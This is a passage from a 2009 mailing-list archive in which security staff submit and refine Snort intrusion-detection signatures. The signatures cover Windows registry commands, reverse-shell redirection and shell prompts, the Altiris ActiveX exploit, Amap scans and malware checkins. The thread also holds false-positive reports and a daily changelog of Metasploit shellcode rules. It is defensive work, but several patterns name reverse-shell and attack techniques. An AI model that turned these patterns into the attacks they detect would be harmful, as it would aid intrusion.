> pcre:"/\d{2}/\d{2}/\d{4}\s+\d{2}\:\d{2}\s+<DIR>\s+.*/"; sid:966600092; rev:1;)
> 
> 
> # %systemroot%
> alert tcp any any -> any any (msg:"ET Windows systemroot var"; content:"|25 73
> 79 73 74 65 6d 72 6f 6f 74 25|"; sid:966600093; rev:1;)
> 
> 
> # reg (query|add|delete|copy|save|restore|load|unload|compare|export|import)
> alert tcp any any -> any any (msg:"ET Windows registry edit";
> pcre:"/reg\s(query|add|delete|copy|save|restore|load|unload|compare|export|import).*/";
> sid:966600094; rev:1;)
> 
> 
> 
> #
> # Unix shell
> #
> 
> # comand >&0 <--- write on std with non create pipe shellcode
> alert tcp any any -> any any (msg:"ET Unix write out on std posible reverse
> shell"; pcre:"/.*>\&0/";sid:966608004; rev:1;)
> 
> 
> #Unix bash user and root ($ and #).
> #h0f at OpenSolarisLab:~$ | root at OpenSolarisLab:~#
> alert tcp any any -> any any (msg:"ET Unix user bash shell prefix";
> pcre:"/.*\@.*\:\~\W(#|$)/";sid:966608005; rev:1;)
> 
> #Unix sh and pure bash ($ and #)
> # sh-3.2$ | sh-3.2#   /  bash-3.2$ | bash-3.2#
> alert tcp any any -> any any (msg:"ET Unix user bash shell prefix";
> pcre:"/(sh|bash)\-\d\.\d\W(#|$)/";sid:966608006; rev:1;)
> 
> 
> 
> 
> 
> 
> 
> 
> 
> -- 
> Alberto Garcia de Dios.
> 
> 
> 
> 
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From jonkman at jonkmans.com  Tue Dec  1 14:33:30 2009
From: jonkman at jonkmans.com (Matthew Jonkman)
Date: Tue, 1 Dec 2009 14:33:30 -0500
Subject: [Emerging-Sigs] Proposed Changes to ET Trojan Data Post to an
	Image File, SIDs 2010066 to 2010070
In-Reply-To: <4B1551B3.7020906@packetmail.net>
References: <4B1551B3.7020906@packetmail.net>
Message-ID: <A612188E-D2E3-422F-B56F-5A57FB0BAABF@jonkmans.com>

I agree with your changes there, posting now. Sorry for the delay!

Matt

On Dec 1, 2009, at 12:26 PM, evilghost at packetmail.net wrote:

> I think this one may have been lost over the holiday week:
> 
> http://lists.emergingthreats.net/pipermail/emerging-sigs/2009-November/004688.html 
> 
> 
> Your thoughts/opinion welcome.  I'd like to see it committed because 
> these are actually good signatures, I feel they just needed a PCRE to 
> avoid false positives.
> 
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From jonkman at jonkmans.com  Tue Dec  1 14:36:59 2009
From: jonkman at jonkmans.com (Matthew Jonkman)
Date: Tue, 1 Dec 2009 14:36:59 -0500
Subject: [Emerging-Sigs] 4 sigs
In-Reply-To: <e75cc74a0911300428w6374d7bfpa2f1d824b34dc3c2@mail.gmail.com>
References: <e75cc74a0911300428w6374d7bfpa2f1d824b34dc3c2@mail.gmail.com>
Message-ID: <DE3F5CBC-26F8-4664-A5D5-C78815ED7953@jonkmans.com>

Got em, these and the amap's are already posted. 

Matt

On Nov 30, 2009, at 7:28 AM, Kevin Ross wrote:

> Top 2 Altiris sigs I submitted last week but got no response. They both should be correct. The bottom 2 replace sig 2008357. The reason I have created different rules to replace this is because they are more accurate and reliable due to the presence of the THC (The Hackers Choice) and also so I can provide accurate coverage of service scans for TCP and UDP services. Both of these I have tested new sigs I have been testing. They should be better performance wise also than the previous sig.
> 
> Kev
> 
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET WEB_CLIENT Possible Symantec Altiris Deployment Solution and Notification Server ActiveX Control RunCmd Arbitrary Code Execution Attempt"; flow:established,to_client; content:"clsid"; nocase; content:"B44D252D-98FC-4D5C-948C-BE868392A004"; nocase; distance:0; content:"RunCmd"; nocase; pcre:"/<OBJECT\s+[^>]*classid\s*=\s*[\x22\x27]?\s*clsid\s*\x3a\s*\x7B?\s*B44D252D-98FC-4D5C-948C-BE868392A004/si"; classtype:attempted-user; reference:url,securitytracker.com/alerts/2009/Nov/1023238.html; reference:url,www.securityfocus.com/bid/37092; reference:cve,2009-3033; sid:18000002; rev:1;)
> 
> alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any ( msg:"ET WEB_CLIENT ACTIVEX Possible Symantec Altiris Deployment Solution and Notification Server ActiveX Control RunCmd Arbitrary Code Execution Function Call Attempt"; flow:to_client,established; content:"ActiveXObject"; nocase; content:"Altiris.AeXNSConsoleUtilities"; nocase; distance:0; content:"RunCmd"; nocase; classtype:attempted-user; reference:url,securitytracker.com/alerts/2009/Nov/1023238.html; reference:url,www.securityfocus.com/bid/37092; reference:cve,2009-3033; sid:18000003; rev:1;)
> 
> alert tcp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET SCAN Amap TCP Service Scan Detected"; flow:to_server; flags:PA; content:"service|3A|thc|3A 2F 2F|"; depth:105; content:"service|3A|thc"; within:40; classtype:attempted-recon; reference:url,freeworld.thc.org/thc-amap/; sid:18000004; rev:1;)
> 
> alert udp $EXTERNAL_NET any -> $HOME_NET any (msg:"ET SCAN Amap UDP Service Scan Detected"; dsize:<135; content:"THCTHCTHCTHCTHC|20 20 20|"; classtype:attempted-recon;  reference:url,freeworld.thc.org/thc-amap/; sid:18000005; rev:1;)
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From jonkman at jonkmans.com  Tue Dec  1 14:38:13 2009
From: jonkman at jonkmans.com (Matthew Jonkman)
Date: Tue, 1 Dec 2009 14:38:13 -0500
Subject: [Emerging-Sigs] JustExploit
In-Reply-To: <53834cf20911300357i31a42c07n5729fbcde088a510@mail.gmail.com>
References: <53834cf20911300357i31a42c07n5729fbcde088a510@mail.gmail.com>
Message-ID: <6BE1D120-0394-4473-A7BD-33370DA2A8DB@jonkmans.com>

Posting, thanks!

Matt

On Nov 30, 2009, at 6:57 AM, Jaime Blasco wrote:

> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE Possible Malicious Applet Access"; flow:to_server,established; uricontent:"/files/sdfg.jar"; classtype: trojan-activity; reference:url,www.malwaredomainlist.com/forums/index.php?topic=3570.0; sid:; rev:2;)


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From jonkman at jonkmans.com  Tue Dec  1 14:41:35 2009
From: jonkman at jonkmans.com (Matthew Jonkman)
Date: Tue, 1 Dec 2009 14:41:35 -0500
Subject: [Emerging-Sigs] Sig for acc0751b17add453c44c93c3e59673f4
In-Reply-To: <9d6a1ae60911290326w50272175k2aa85af71f8aeaca@mail.gmail.com>
References: <9d6a1ae60911290326w50272175k2aa85af71f8aeaca@mail.gmail.com>
Message-ID: <E634DAFF-3705-48F4-9F74-144CCE23829D@jonkmans.com>

I imagine this can happen with poorly built VB apps, but it should be suspicious no matter where you see it.

Posting, thanks Bojan!

Matt

On Nov 29, 2009, at 6:26 AM, Bojan Zdrnja (SANS ISC) wrote:

> alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ET MALWARE
> Generic Trojan Checkin"; flow: to_server,established; content:"GET ";
> depth: 4; content: "HTTP/1.0|0d 0a|User-Agent|3a| VBTagEdit"; nocase;
> sid: 2009999; rev:1;)


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From jonkman at jonkmans.com  Tue Dec  1 14:56:25 2009
From: jonkman at jonkmans.com (Matthew Jonkman)
Date: Tue, 1 Dec 2009 14:56:25 -0500
Subject: [Emerging-Sigs] November Sig Contest
Message-ID: <FAAECD31-19F7-4354-BCBB-FA35DDAFD8EB@jonkmans.com>

Alright, now that I'm caught up on the signatures that were submitted yesterday, we can declare a winner for November. 

If my calculations are correct, Evilghost had the lead until the very last minute. But Alberto Garcia de Dios got 53 accepted right at the wire. 

A good month for signatures, thanks everyone for your efforts! It's definitely appreciated. The December contest is already under way!!!

Matt

----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From mail at mare-system.de  Tue Dec  1 14:59:09 2009
From: mail at mare-system.de (mex)
Date: Tue, 01 Dec 2009 20:59:09 +0100
Subject: [Emerging-Sigs] jennylab.rules - Shell Thread
In-Reply-To: <312CCDA0-FF4F-4AA4-9CFE-4D123FCCE1F4@jonkmans.com>
References: <31941.10.160.5.68.1259605662.squirrel@correo.andaluciajunta.es>
	<312CCDA0-FF4F-4AA4-9CFE-4D123FCCE1F4@jonkmans.com>
Message-ID: <4B15758D.70402@mare-system.de>


this would fp a lot when you browse windows-specific sites, where
the term %systemroot% is found quite often

> 
> # %systemroot%
> alert tcp any any -> any any (msg:"ET Windows systemroot var"; content:"|25 73 79 73 74 65 6d 72 6f 6f 74 25|"; sid:2010452; rev:1;)
> 


> 
> # reg (query|add|delete|copy|save|restore|load|unload|compare|export|import)
> alert tcp any any -> any any (msg:"ET Windows registry edit"; pcre:"/reg\s(query|add|delete|copy|save|restore|load|unload|compare|export|import).*/"; sid:2010453; rev:1;)

these too; one suggestion:

alert tcp any any -> $WINDOWS_SERVERS any (msg:"ET Windows systemroot var"; 
content:"|25 73 79 73 74 65 6d 72 6f 6f 74 25|"; sid:2010452; rev:1 ;-))


i think it's better to detect the shellcodes than to match on strings send over the wires
in emails or any unencrypted datatransfer.



mex



From jonkman at jonkmans.com  Tue Dec  1 15:02:17 2009
From: jonkman at jonkmans.com (Matthew Jonkman)
Date: Tue, 1 Dec 2009 15:02:17 -0500
Subject: [Emerging-Sigs] Malwareurl.com Top 30 Update
In-Reply-To: <MAIL8s4KWiGtXsL1c0000000062@mail.nhrs.org>
References: <MAIL8s4KWiGtXsL1c0000000062@mail.nhrs.org>
Message-ID: <7093D46D-A2D6-44DF-8D0F-2C0C17BC29E7@jonkmans.com>

I like "flash-HQ-plugin.40000.exe" for a sig. Will post something. 

Anyone see anything else we need to get in this list?

Matt


On Nov 30, 2009, at 6:00 AM, jason.weir at nhrs.org wrote:

> flash-HQ-plugin.40000.exe


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From evilghost at packetmail.net  Tue Dec  1 15:08:39 2009
From: evilghost at packetmail.net (evilghost@packetmail.net)
Date: Tue, 1 Dec 2009 14:08:39 -0600
Subject: [Emerging-Sigs] November Sig Contest
In-Reply-To: <FAAECD31-19F7-4354-BCBB-FA35DDAFD8EB@jonkmans.com>
References: <FAAECD31-19F7-4354-BCBB-FA35DDAFD8EB@jonkmans.com>
Message-ID: <4B1577C7.9030209@packetmail.net>

Haha!  Congratulations Alberto Garcia de Dios, very nice.  I shall go 
shirtless in protest for the month of December (kind of like that VRT 
guy did when he did a celebratory dance, but for a longer period of time).

Matthew Jonkman wrote:
> Alright, now that I'm caught up on the signatures that were submitted yesterday, we can declare a winner for November. 
>
> If my calculations are correct, Evilghost had the lead until the very last minute. But Alberto Garcia de Dios got 53 accepted right at the wire. 
>
> A good month for signatures, thanks everyone for your efforts! It's definitely appreciated. The December contest is already under way!!!
>
> Matt
>
> ----------------------------------------------------
> Matthew Jonkman
> Emerging Threats
> Open Information Security Foundation (OISF)
> Phone 765-429-0398
> Fax 312-264-0205
> http://www.emergingthreats.net
> http://www.openinformationsecurityfoundation.org
> ----------------------------------------------------
>
> PGP: http://www.jonkmans.com/mattjonkman.asc
>
>
>
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs
>
>   

From jonkman at jonkmans.com  Tue Dec  1 15:27:06 2009
From: jonkman at jonkmans.com (Matthew Jonkman)
Date: Tue, 1 Dec 2009 15:27:06 -0500
Subject: [Emerging-Sigs] RBN sigs?
In-Reply-To: <F236CDCE34685A458D315422458642E201D307DE@pine.nhrs.org>
References: <F236CDCE34685A458D315422458642E201D307DE@pine.nhrs.org>
Message-ID: <00C08086-F056-45CA-A2CC-1A26F6512381@jonkmans.com>

Inbound spam reverse lookups?

Matt

On Dec 1, 2009, at 2:25 PM, Weir, Jason wrote:

> I'm seeing quite a few alerts on the RBN UDP rules - dest address is
> always one of my internal DNS boxes src port 53 and the traffic looks
> like valid responses to DNS queries.  FW logs confirm the outbound DNS
> query.
> 
> No other RBN sigs are triggering.  
> 
> Can someone give me a scenario where I'm doing lookups to and receiving
> responses from DNS servers on the RBN list for hosts not on the RBN?
> Hope I worded that right. Just seems odd..
> 
> -Jason
> 
> 
> _____________________________________________________________________________________________
> 
> Please visit www.nhrs.org to subscribe to NHRS email announcements and updates.
> _______________________________________________
> Emerging-sigs mailing list
> Emerging-sigs at emergingthreats.net
> http://lists.emergingthreats.net/mailman/listinfo/emerging-sigs


----------------------------------------------------
Matthew Jonkman
Emerging Threats
Open Information Security Foundation (OISF)
Phone 765-429-0398
Fax 312-264-0205
http://www.emergingthreats.net
http://www.openinformationsecurityfoundation.org
----------------------------------------------------

PGP: http://www.jonkmans.com/mattjonkman.asc




From jason.weir at nhrs.org  Tue Dec  1 15:41:09 2009
From: jason.weir at nhrs.org (Weir, Jason)
Date: Tue, 1 Dec 2009 15:41:09 -0500
Subject: [Emerging-Sigs] RBN sigs?
In-Reply-To: <00C08086-F056-45CA-A2CC-1A26F6512381@jonkmans.com>
Message-ID: <F236CDCE34685A458D315422458642E201D307E0@pine.nhrs.org>

Good idea - had not thought of that but doubtful - currently successful
inbound spam delivery numbers are never higher than 5 a day (low email
traffic <1000 daily, and a good spam filter) - I'm seeing much higher
sig triggers...

-J

-----Original Message-----
From: Matthew Jonkman [mailto:jonkman at jonkmans.com] 
Sent: Tuesday, December 01, 2009 3:27 PM
To: Weir, Jason
Cc: Emerging-Sigs
Subject: Re: [Emerging-Sigs] RBN sigs?


Inbound spam reverse lookups?

Matt

On Dec 1, 2009, at 2:25 PM, Weir, Jason wrote:

> I'm seeing quite a few alerts on the RBN UDP rules - dest address is
> always one of my internal DNS boxes src port 53 and the traffic looks
> like valid responses to DNS queries.  FW logs confirm the outbound DNS
> query.
> 
> No other RBN sigs are triggering.  
> 
> Can someone give me a scenario where I'm doing lookups to and
receiving
> responses from DNS servers on the RBN list for hosts not on the RBN?
> Hope I worded that right. Just seems odd..
> 
> -Jason


_____________________________________________________________________________________________

Please visit www.nhrs.org to subscribe to NHRS email announcements and updates.

From jason.weir at nhrs.org  Tue Dec  1 15:44:25 2009
From: jason.weir at nhrs.org (Weir, Jason)
Date: Tue, 1 Dec 2009 15:44:25 -0500
Subject: [Emerging-Sigs] FP on 2003055
Message-ID: <F236CDCE34685A458D315422458642E201D307E1@pine.nhrs.org>

I'm seeing falses on 2003055

alert tcp $HOME_NET !21:902 -> any any (msg:"ET MALWARE Suspicious 220
Banner on Local Port"; flow:from_server,established; content:"220";
offset:0; depth:4; pcre:"/220[- ]/"; classtype:non-standard-protocol;
reference:url,doc.emergingthreats.net/bin/view/Main/2003055;
reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/MALWARE/MA
LWARE_Off_Port_FTP; sid:2003055; rev:5;)

is there any better way to determine if it's actually a banner?  I'm
seeing regular SQL traffic with 220 in it that looks nothing like a
banner.  

Oh and by the way how was the excluded port range defined?

Here is an example of my traffic that is triggering..

000 : 32 32 30 30 35 30 20 20 20 20 20 20 20 20 20 20   220050          
010 : 20 20 20 20 D1 14 00 32 32 30 30 35 32 20 20 20       ...220052   
020 : 20 20 20 20 20 20 20 20 20 20 20 D1 14 00 32 32              ...22
030 : 30 30 38 36 20 20 20 20 20 20 20 20 20 20 20 20   0086            
040 : 20 20 D1 14 00 32 32 30 31 31 36 20 20 20 20 20     ...220116     
050 : 20 20 20 20 20 20 20 20 20 D1 14 00 32 32 30 31            ...2201
060 : 31 38 20 20 20 20 20 20 20 20 20 20 20 20 20 20   18              
070 : D1 14 00 32 32 30 31 35 32 20 20 20 20 20 20 20   ...220152       
080 : 20 20 20 20 20 20 20 D1 14 00 32 32 30 31 36 39          ...220169
090 : 20 20 20 20 20 20 20 20 20 20 20 20 20 20 D1 14                 ..
0a0 : 00 32 32 30 31 38 34 20 20 20 20 20 20 20 20 20   .220184         
0b0 : 20 20 20 20 20 D1 14 00 32 32 30 32 31 36 20 20        ...220216  
0c0 : 20 20 20 20 20 20 20 20 20 20 20 20 D1 14 00 32               ...2
0d0 : 32 30 32 32 30 20 20 20 20 20 20 20 20 20 20 20   20220           
0e0 : 20 20 20 D1 14 00 32 32 30 32 33 33 20 20 20 20      ...220233    
0f0 : 20 20 20 20 20 20 20 20 20 20 D1 14 00 32 32 30             ...220
100 : 32 33 35 20 20 20 20 20 20 20 20 20 20 20 20 20   235             
110 : 20 D1 14 00 32 32 30 32 36 37 20 20 20 20 20 20    ...220267      
120 : 20 20 20 20 20 20 20 20 D1 14 00 32 32 30 32 38           ...22028
130 : 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 D1   4              .
140 : 14 00 32 32 30 33 32 30 20 20 20 20 20 20 20 20   ..220320        
150 : 20 20 20 20 20 20 D1 14 00 32 32 30 33 35 32 20         ...220352 


-J





_____________________________________________________________________________________________

Please visit www.nhrs.org to subscribe to NHRS email announcements and updates.

From emerging at emergingthreats.net  Tue Dec  1 16:00:12 2009
From: emerging at emergingthreats.net (emerging@emergingthreats.net)
Date: Tue,  1 Dec 2009 16:00:12 -0500 (EST)
Subject: [Emerging-Sigs] Emerging Threats Daily Signature Changes
Message-ID: <20091201210012.622B84504F@goliath.jonkmans.com>


[***] Results from Oinkmaster started Tue Dec  1 16:00:12 2009 [***]

[+++]          Added rules:          [+++]

 2010373 - ET WEB_CLIENT Haihaisoft Universal Player ActiveX Control URL Property Buffer Overflow Attempt (emerging-web_client.rules)
 2010374 - ET WEB_CLIENT ACTIVEX Haihaisoft Universal Player ActiveX Control URL Property Buffer Overflow Function Call Attempt (emerging-web_client.rules)
 2010375 - ET EXPLOIT Possible Oracle Database Text Component ctxsys.drvxtabc.create_tables Remote SQL Injection Attempt (emerging-exploit.rules)
 2010376 - ET CURRENT_EVENTS WU Malicious Spam Inbound (emerging-current_events.rules)
 2010377 - ET POLICY JBOSS/JMX 80 access from outside (emerging-policy.rules)
 2010378 - ET POLICY JBOSS/JMX 8080 access from outside (emerging-policy.rules)
 2010379 - ET WEB-APPS JBOSS/JMX REMOTE WAR deployment attempt (POST) (emerging-web_server.rules)
 2010380 - ET WEB-APPS JBOSS/JMX REMOTE WAR deployment attempt (GET) (emerging-web_server.rules)
 2010381 - ET TROJAN Bredolab Checkin (emerging-virus.rules)
 2010382 - ET TROJAN Fake AV GET (emerging-virus.rules)
 2010383 - ET EXPLOIT METASPLOIT BSD Bind shell (emerging-exploit.rules)
 2010384 - ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 1) (emerging-exploit.rules)
 2010385 - ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 2) (emerging-exploit.rules)
 2010386 - ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 3) (emerging-exploit.rules)
 2010387 - ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 4) (emerging-exploit.rules)
 2010388 - ET EXPLOIT METASPLOIT BSD Bind shell (Countdown Encoded 5) (emerging-exploit.rules)
 2010389 - ET EXPLOIT METASPLOIT BSD Bind shell (Pex Encoded 1) (emerging-exploit.rules)
 2010390 - ET EXPLOIT METASPLOIT BSD Bind shell (Pex Encoded 2) (emerging-exploit.rules)
 2010391 - ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 1) (emerging-exploit.rules)
 2010392 - ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 2) (emerging-exploit.rules)
 2010393 - ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 3) (emerging-exploit.rules)
 2010394 - ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 4) (emerging-exploit.rules)
 2010395 - ET EXPLOIT METASPLOIT BSD Bind shell (Not Encoded 5) (emerging-exploit.rules)
 2010396 - ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 1) (emerging-exploit.rules)
 2010397 - ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 2) (emerging-exploit.rules)
 2010398 - ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 3) (emerging-exploit.rules)
 2010399 - ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 4) (emerging-exploit.rules)
 2010400 - ET EXPLOIT METASPLOIT BSD Bind shell (Pex Alphanumeric Encoded 5) (emerging-exploit.rules)
 2010401 - ET EXPLOIT METASPLOIT BSD Bind shell (PexFstEnvMov Encoded 1) (emerging-exploit.rules)
 2010402 - ET EXPLOIT METASPLOIT BSD Bind shell (PexFstEnvMov Encoded 2) (emerging-exploit.rules)
 2010403 - ET EXPLOIT METASPLOIT BSD Bind shell (JmpCallAdditive Encoded) (emerging-exploit.rules)
 2010404 - ET EXPLOIT METASPLOIT BSD Bind shell (Alpha2 Encoded 1) (emerging-exploit.rules)
 2010405 - ET EXPLOIT METASPLOIT BSD Bind shell (Alpha2 Encoded 2) (emerging-exploit.rules)
 2010406 - ET EXPLOIT METASPLOIT BSD Bind shell (Alpha2 Encoded 3) (emerging-exploit.rules)
 2010407 - ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvSub Encoded 1) (emerging-exploit.rules)
 2010408 - ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvSub Encoded 2) (emerging-exploit.rules)
 2010409 - ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 1) (emerging-exploit.rules)
 2010410 - ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 2) (emerging-exploit.rules)
 2010411 - ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 3) (emerging-exploit.rules)
 2010412 - ET EXPLOIT METASPLOIT BSD Reverse shell (Countdown Encoded 4) (emerging-exploit.rules)
 2010413 - ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Encoded 1) (emerging-exploit.rules)
 2010414 - ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Encoded 2) (emerging-exploit.rules)
 2010415 - ET EXPLOIT METASPLOIT BSD Reverse shell (Not Encoded 1) (emerging-exploit.rules)
 2010416 - ET EXPLOIT METASPLOIT BSD Reverse shell (Not Encoded 2) (emerging-exploit.rules)
 2010417 - ET EXPLOIT METASPLOIT BSD Reverse shell (Not Encoded 3) (emerging-exploit.rules)
 2010418 - ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Alphanumeric Encoded 1) (emerging-exploit.rules)
 2010419 - ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Alphanumeric Encoded 2) (emerging-exploit.rules)
 2010420 - ET EXPLOIT METASPLOIT BSD Reverse shell (Pex Alphanumeric Encoded 3) (emerging-exploit.rules)
 2010421 - ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvMov Encoded 1) (emerging-exploit.rules)
 2010422 - ET EXPLOIT METASPLOIT BSD Reverse shell (PexFnstenvMov Encoded 2) (emerging-exploit.rules)
 2010423 - ET EXPLOIT METASPLOIT BSD Reverse shell (JmpCallAdditive Encoded 1) (emerging-exploit.rules)
 2010424 - ET EXPLOIT METASPLOIT BSD Reverse shell (Alpha2 Encoded 1) (emerging-exploit.rules)
 2010425 - ET EXPLOIT METASPLOIT BSD Reverse shell (Alpha2 Encoded 2) (emerging-exploit.rules)
 2010426 - ET EXPLOIT METASPLOIT BSD Reverse shell (Alpha2 Encoded 3) (emerging-exploit.rules)
 2010427 - ET EXPLOIT METASPLOIT BSD SPARC Bind shell (SPARC Encoded 1) (emerging-exploit.rules)
 2010428 - ET EXPLOIT METASPLOIT BSD SPARC Bind shell (SPARC Encoded 2) (emerging-exploit.rules)
 2010429 - ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 1) (emerging-exploit.rules)
 2010430 - ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 2) (emerging-exploit.rules)
 2010431 - ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 3) (emerging-exploit.rules)
 2010432 - ET EXPLOIT METASPLOIT BSD SPARC Bind shell (Not Encoded 4) (emerging-exploit.rules)
 2010433 - ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (Not Encoded 1) (emerging-exploit.rules)
 2010434 - ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (Not Encoded 2) (emerging-exploit.rules)
 2010435 - ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (SPARC Encoded 1) (emerging-exploit.rules)
 2010436 - ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (SPARC Encoded 2) (emerging-exploit.rules)
 2010437 - ET EXPLOIT METASPLOIT BSD SPARC Reverse shell (Not Encoded 3) (emerging-exploit.rules)
 2010438 - ET MALWARE Possible Malicious Applet Access (justexploit kit) (emerging-malware.rules)
 2010439 - ET TROJAN Generic Trojan Checkin (UA VBTagEdit) (emerging-virus.rules)
 2010440 - ET CURRENT_EVENTS MALWARE Potential Malware Download, flash-HQ-plugin.40000.exe (emerging-current_events.rules)


[///]     Modified active rules:     [///]

 2010066 - ET TROJAN Data POST to an image file (gif) (emerging-virus.rules)
 2010067 - ET TROJAN Data POST to an image file (jpg) (emerging-virus.rules)
 2010068 - ET TROJAN Data POST to an image file (jpeg) (emerging-virus.rules)
 2010069 - ET TROJAN Data POST to an image file (bmp) (emerging-virus.rules)
 2010070 - ET TROJAN Data POST to an image file (png) (emerging-virus.rules)
 2010369 - ET WEB_CLIENT Possible Symantec Altiris Deployment Solution and Notification Server ActiveX Control RunCmd Arbitrary Code Execution Attempt (emerging-web_client.rules)
 2010370 - ET WEB_CLIENT ACTIVEX Possible Symantec Altiris Deployment Solution and Notification Server ActiveX Control RunCmd Arbitrary Code Execution Function Call Attempt (emerging-web_client.rules)
 2010371 - ET SCAN Amap TCP Service Scan Detected (emerging-scan.rules)
 2010372 - ET SCAN Amap UDP Service Scan Detected (emerging-scan.rules)


[---]         Removed rules:         [---]

 2008357 - ET SCAN Amap Scannner Traffic Inbound (emerging-scan.rules)


[+++]      Added non-rule lines:     [+++]

     -> Added to emerging-current_events.rules (1):
        #matt jonkman

     -> Added to emerging-exploit.rules (37):
        # Metasploit BSD shellcode detect rules by h0f - Jennylab
        # Alberto Garcia de Dios
        # albertogdedios at andaluciajunta.es
        # http://www.jennylab.org
        #####
        # METASPLOIT SHELLCODE RULES
        #####
        # BSD METASPLOIT RULES
        #### BSD BIND SHELL #######
        # BSD Bind Shell - ENCODE: PexFnstenvSub
        # BSD Bind Shell - ENCODE: CountDown
        #BSD Bind Shell - ENCODE: Pex
        #BSD Bind Shell - ENCODE: None
        #BSD Bind Shell - ENCODE: PexAlphaNum
        #BSD Bind Shell - ENCODE: PexFstEnvMov
        #BSD Bind Shell - ENCODE: JmpCallAditive
        #BSD Bind Shell - ENCODE: Alpha2
        #### EOF BSD BIND SHELL ######
        ### BSD REVERSE SHELL #######
        #BSD Reverse Shell - ENCODE: PexFnstenvSub
        #BSD Reverse Shell - ENCODE: Countdown
        #BSD Reverse Shell - ENCODE: Pex
        #BSD Reverse Shell - ENCODE: None
        #BSD Reverse Shell - ENCODE: PexAlphaNum
        #BSD Reverse Shell - ENCODE: PexFnstenvMov
        #BSD Reverse Shell - ENCODE: JmpCallAditive
        #BSD Reverse Shell - ENCODE: Alpha2
        ##### EOF BSD Reverse Shell#####
        ##### BSD SPARC Bind Shell #########
        #BSD SPARC Bind Shell - ENCODE: SPARC
        #BSD SPARC Bind Shell - ENCODE: None
        #### EOF BSD SPARC Bind Shell #########4
        ### BSD SPARC Reverse Shell ########
        #BSD SPARC Reverse Shell - ENCODE: None
        #BSD SPARC Reverse Shell - ENCODE: SPARC
        #### EOF BSD SPARC Reverse Shell ####
        #by Kevin Ross

     -> Added to emerging-malware.rules (1):
        #by Jamie Blasco

     -> Added to emerging-policy.rules (1):
        #by mex

     -> Added to emerging-sid-msg.map (140):
